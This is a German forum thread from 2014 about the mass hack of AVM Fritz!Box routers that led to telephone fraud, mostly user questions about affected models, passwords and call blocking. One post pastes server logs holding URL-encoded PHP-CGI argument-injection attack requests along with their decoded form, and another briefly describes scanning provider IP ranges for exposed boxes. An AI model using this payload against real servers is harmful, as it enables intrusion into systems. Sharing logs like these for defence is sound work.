[Info] [Update] Telefonie-Missbrauch (anscheinend doch) Massenhack von AVMs Fritzboxen

[Goggo16]

@snoopydog,

interessante Analyse.

Die Kernpunkte des Problems bleiben unbekannt. Angriffsvektor und Schwachstelle.

Und noch dazu:

Was macht man eigentlich mit den Boxen, fuer die es keine Sofware-Updates mehr gibt.

Eine neue kaufen?

Irgendwie hat die Geschichte für mich den faden Beigeschmack, dass hier mit dem gezielten abwracken alter Boxen der Verkauf wieder etwas angekurbelt werden soll.

Nix fuer Ungut. Halt meine Meinung dazu.

Gruss

Goggo

 

[johnripper]

Was macht man eigentlich mit den Boxen, fuer die es keine Sofware-Updates mehr gibt.

Fernwartung aus.
Warum? AVM fixted doch teilweise auch die älteren Boxen.

Sorry manchmal sind die Posts einfach nicht wirklich durchdacht.

 

[robert78]

@gogo

geht mir nicht anders. meine 7570 wird nicht mehr von AVM Supportet.

was Solls

 

[johnripper]

Die 7570 wurde in Deutschland überhaupt nicht beworben und verkauft sondern war nur über die Telekom als Speedport 920V erhältlich.

Da musst du dich an die Telekom wenden.

 

[Bowser]

@KunterBunter:

Die Zugangskennung ist ja logischerweise auch im Router gespeichert, muss man nun auch das Internetzugangspasswort ändern, oder nicht?

Ganz allegemein: Ich dachte eigentlich, dass die Passwörter in der Fritzbox nur verschlüsselt abgelegt sind. Wie ist es dann möglich diese einfach auszulesen???

Viele Grüße

 

[qwertz.asdfgh]

Zum Titel: Bitte ändern. Der ist ja nun wirklich überholt.

Es müsste ja auch nur ein einziges kleines Wort entfernt werden damit der Titel wieder stimmt.

Ist die 7170 überhaupt betroffen, oder nur neue Boxen mit FritzOS?

Laut AVM angeblich nicht.


Viel mehr würde mich aber interessieren was mit der 7570 und 7270v1 ist (also ob überhaupt betroffen)!

Ganz allegemein: Ich dachte eigentlich, dass die Passwörter in der Fritzbox nur verschlüsselt abgelegt sind. Wie ist es dann möglich diese einfach auszulesen?

Die Box muss (falls verschlüsselt gespeichert) die Zugangsdaten auch wieder entschlüsseln können da die Passwörter ja auch verwendet werden, warum sollte das also nicht möglich sein?

 

[Trachau]

Wenn man das Update und auch alle Passwörter geändert hat, kann man dann die Fernwartung wieder nutzen oder lieber nicht?
Vielen Dank im voraus.

 

[scolopender]

Das steht bereits bei #288.

G., -#####o:

 

[pumana]

Laut AVM angeblich nicht. Viel mehr würde mich aber interessieren was mit der 7570 und 7270v1 ist (also ob überhaupt betroffen)!

Angeblich? Woher stammt diese Info. Ich finde im Netz widersprüchliche Aussagen diesbezüglich. Wie wär´s wenn AVM mal eine verbindliche Liste aller betroffenen Modelle veröffentlicht, nur dann würde ich die Fernwartung an den 7170 wieder aktivieren.

Andere Frage - bis jetzt wurden über VoIP die Mehrwertdienste angerufen. Gab es auch Angriffe, wo auch über normales analoges Festnetz zum Missbrauch gekommen ist? Theoretisch ist das auch möglich, oder?

 

[Mr.Richi]

Ich hätte mal 3 Fragen:

1) Kann ich in der 7390 auch nur gespräche für die EU Freigeben (Ausland sperren ist zu heftig, denn in der EU Telefoniere ich schon)

2) Betrifft das Sicherheitsrisiko eigentlich nur die AVM version 6, oder auch die vorgängerversionen wie 4 und 5 ?

3) Wenn man betroffen ist taucht ein neues Telefongerät im Menü auf ?

 

[RalfFriedl]

Aber um so weit zu kommen, daß man diese Sicherheitslücke aktiv ausnutzen kann, benötigt man Zugriff auf eine physikalisch vorhandene Box. Wenn sie bei myfritz.net registriert ist, gibt es 2 Möglichkeiten, um auf die Box zu kommen:
1. Man loggt sich im Browser bei myfritz.net mit Mail-Adresse ( = username ) und Paßwort ein und wird zur Fritz!box-Einstiegsseite mit Login weitergeleitet.
2. Man verwendet direkt die pseudo-obskure Subdomain von myfritz.net, auf die man in Schritt 1. weitergeleitet wird - diese wird auch in der Web-Oberfläche der Box angezeigt.

Es gibt noch eine andere Möglichkeit. Fritz Boxen sind in Deutschland weit verbreitet und werden von den Providern subventioniert. Wenn man also die IP-Adressen der Provider scannt, ist es wahrscheinlich, dass überwiegend Fritz Boxen dran hängen. Dann braucht man nur noch die zu finden, wo Fernwartung aktiv ist. Und wenn man erst mal drauf ist, sieht man auch, über welchen Namen der Besitzer darauf zugreift (MyFritz, DynDns, ...).

 

[Hans Juergen]

@ MrRichi:
zu 1: Nein, aber du könntest ein Prepaid-Konto für Auslandsgesprächen einrichten (z. B. Freevoipdeal.com), in der FB eine Wahlregel dafür anlegen und dann bei deinem Standard-Provider alle Auslandsgespräche sperren.

 

[Peters]

Gute und schlechte Nachricht für alle 7170 (und drunter) Besitzer.

Die schlechte zuerst: Es betrifft auch die 7170 Router.

Die gute Nachricht: AVM bringt auch für diese Modelle einen Fix in den nächsten Tagen.

Quelle AVM Support Team (Hotline 030-39004 544)

 

[HabNeFritzbox]

Ich habe noch mal in meine Logs vom NAS geschaut, wo auch Port 443 drauf geht.

Es sind doch Versuchte Angriffe drauf.

[Sun Feb 09 13:44:01 2014] [error] [client 67.205.86.213] File does not exist: /var/services/web/cgi-bin
[Sun Feb 09 13:44:01 2014] [error] [client 67.205.86.213] File does not exist: /var/services/web/cgi-bin
[Sun Feb 09 13:44:01 2014] [error] [client 67.205.86.213] File does not exist: /var/services/web/cgi-bin
[Sun Feb 09 13:44:02 2014] [error] [client 67.205.86.213] File does not exist: /var/services/web/cgi-bin
[Sun Feb 09 13:44:02 2014] [error] [client 67.205.86.213] File does not exist: /var/services/web/cgi-bin

67.205.86.213 - - [09/Feb/2014:13:44:00 +0100] "HEAD / HTTP/1.0" 403 - "-" "-"
67.205.86.213 - - [09/Feb/2014:13:44:01 +0100] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 800 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
67.205.86.213 - - [09/Feb/2014:13:44:01 +0100] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 800 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
67.205.86.213 - - [09/Feb/2014:13:44:01 +0100] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 800 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
67.205.86.213 - - [09/Feb/2014:13:44:02 +0100] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 800 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
67.205.86.213 - - [09/Feb/2014:13:44:02 +0100] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 800 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"

Die URL durch den Decoder ergibt

/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

Es wird also versucht direkt Rechte vom PHP zu verändern, wohl mit Erfolg, wenn nun ein Fix notwendig ist und Warnungen. Dazu wird es wohl auf die Mobile Seite abgesehen, wenn man nach der Browser Kennung geht.

Im Log finde ich 4 Versuche mit jeweils einer anderen IP (2.24.156.173, 41.228.38.39, 37.187.88.36, 67.205.86.213), der Erste ist vom 2. Feb.

Wer auch Logs hat, kann ja auch mal nach schauen, ob dort was zu finden ist.

 

[Micha0815]

Zwischenfrage

wenn die Fritten auf dem aktuellen FW-Stand sind, wird trotzdem empfohlen, jedwede Passwörter zu ändern, falls der Fernzugriff vormals aktiviert war.
In den von mir via VPN betreuten Boxen konnte ich in den LOGs nichts ungewöhnliches entdecken bzgl. Fernzugriff, IP-Phones usw. (ausser dem eigenen). Die eingesetzten E-Mail-Addies sind auch nicht beim BSI gelistet als gehacked. Der eigene PC lt. avast + win-defender sauber.

Eine Kontrolle im 1&1-CC ergab auch nur normales Gesprächsgebührenaufkommen.

Falls ich es richtig begriffen habe, fanden die An-/Zugriffe z.T. ohne Kenntnis von PWs Usernamen statt?
Fanden die Zugriffe ganz spurlos statt unter Auslesens jedweder Config-Daten (ar7.cfg?).

LG

OT: Bei sipgate-basic kann ich die Login-Daten ändern, ändert sich dadurch auch das kryptische FB-Passwort?

 

[lolly3]

Wer auch Logs hat, kann ja auch mal nach schauen, ob dort was zu finden ist.

Du meinst Logs von einem FB externen NAS also nicht das Fritz.NAS?!
Ich nutze nur das FritzNAS bei meiner FB7240 finde dazu aber keinen extra Log unter "System" > "Ereignisse".

Schaue ich nur an der falschen Stelle?

 

[dunki]

Bin mir nicht ganz sicher, wie die Sicherheitswarnung zu verstehen ist: erfolgte nur das Einrichten der ip-Telefone über den Fernwartungszugang (443) oder auch das Auslesen der Passwörter? D.h. wenn ich den https Zugang zu keiner Zeit angeschaltet hatte, konnte dann jemand die Passworte auslesen?

 

[SaschaBr]

Du meinst Logs von einem FB externen NAS also nicht das Fritz.NAS?! ...

Genau das meinte er. Da er den Port 443 auf das externe (echte) NAS weiterleitet, hat dieses den Einbruchversuch, der für die Fritz!Box gedacht war, protokolliert.

 

[dunki]

Auf der Fritz!Box gibt es kein Verzeichnis /var/services/cgi-bin und ich glaube auch keine php. Daher war der oben protokollierte Angriff wahrscheinlich nicht für eine Fritz!Box gedacht...

 

[Axim88]

@ MrRichi:
zu 1: Doch, es geht.

Ausgehende Rufe Ausland ist nichts anderes als Sperrung der Vorwahl 00.
Du kannst mit drei Ziffern den Filter zerteilen. Also 001 – 009 und Auslandgespräche sind auch gesperrt.
Willst Du z.B, Polen ausnehmen von der Sperre, dann noch 0040 – 0047, und 0049 sperren.
Ja, 0049 ist Deutschland. Kann ebenfalls weggelassen werden, aber so kann man auch Tricks umgehen um z.B. nationale Sperren zu umgehen. Beispiel 004930 ist auch die Vorwahl für Berlin, wenn 030 gesperrt sein sollte.

Prinzip verstanden? (Alles was nicht erlaubt ist wird verboten.)
Hier die Liste, wenn Polen 0048 nicht gesperrt wird:

001
002
003
004
005
006
007
008
009
0040
0041
0042
0043
0044
0045
0046
0047
0049

Gruß Axim